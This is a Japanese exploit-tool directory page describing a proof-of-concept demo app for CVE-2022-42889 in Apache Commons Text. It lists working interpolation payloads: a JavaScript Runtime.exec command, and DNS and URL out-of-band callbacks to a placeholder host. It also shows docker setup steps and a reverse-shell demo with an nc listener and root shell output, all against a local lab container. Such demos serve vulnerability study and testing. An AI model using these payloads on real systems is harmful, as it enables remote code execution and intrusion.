Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/korteke/cve-2022-42889-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubkorteke/cve-2022-42889-poc

CVE-2022-42889-POC

CVE-2022-42889 脆弱性を悪用する方法を示すシンプルなアプリケーション

リポジトリを見る
11713年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-42889-POC

CVE-2022-42889 脆弱性を悪用する方法を示すシンプルなデモアプリケーションです。
OOB(Out of Band)サービスを利用して、dnsおよびurlプレフィックスをデモンストレーションします。

commons-text 補間のJavaDocs commons-text JavaDocs

補間の例

  • script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
  • dns ("${dns:address|HOST}")
  • url ("${url:UTF-8:http://HOST")

Rapid7からの引用

この脆弱性は、オープンソースライブラリレベルの脆弱性であり、関連オブジェクトを使用する多種多様なソフトウェアアプリケーションに影響を与える可能性が高いことから、Log4Shellと比較されています。
しかし、初期分析では、この比較は適切ではないことが示されています。脆弱性の性質上、Log4Shellとは異なり、アプリケーションがCommons Textの脆弱なコンポーネントを使用して信頼できない潜在的に悪意のある入力を処理することは稀であることを意味します。

前提条件

  • docker
  • java
  • maven

Docker Hubからイメージを取得する場合は、Javaとmavenは不要です。Docker Hub

使用方法

アプリケーションのビルド

root@kitploit:~
mvn clean package

Dockerイメージのビルド

root@kitploit:~
docker build -t cve-2022-42889-poc .

Dockerイメージの実行

root@kitploit:~
docker run --rm -p 8081:8081 -t cve-2022-42889-poc

アプリケーションにアクセスし、指示に従ってください。

root@kitploit:~
open http://localhost:8081

/tmp/ディレクトリ(/tmp/blop)に新しいファイルが作成されることを確認します。

root@kitploit:~
➜  ~ docker exec -ti cve-2022-42889-poc /bin/ls /tmp

blop		 tomcat-docbase.8081.12439436974042217796
hsperfdata_root  tomcat.8081.2549096106233509364
➜  ~

リバースシェル。ローカルマシンで"nc"を起動します。

root@kitploit:~
➜  ~ nc -lv 4242
root@7cfcd6a39a61:/# whoami && uname -a
whoami && uname -a
root
Linux 7cfcd6a39a61 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64 GNU/Linux
root@7cfcd6a39a61:/#

UI

ネットワークインタラクションの証明。ローカルのinteractsh-clientでテスト済み。

詳細情報

  • NIST NVD
  • Rapid 7
ツールをダウンロード